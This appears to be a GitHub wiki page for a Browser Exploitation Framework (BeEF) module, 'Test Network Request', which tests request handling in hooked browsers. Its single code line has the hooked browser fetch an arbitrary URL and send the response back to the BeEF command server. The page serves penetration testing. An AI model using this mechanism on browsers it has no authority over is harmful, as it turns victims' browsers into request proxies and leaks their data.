Module: Test Network Request - h4sh5/beef GitHub Wiki

Summary

  • Objective: Test the beef.net.request function by retrieving a URL.

  • Authors: bcoles

  • Browsers: All

  • Code

Internal Working

beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, JSON.stringify(response)); } )

Feedback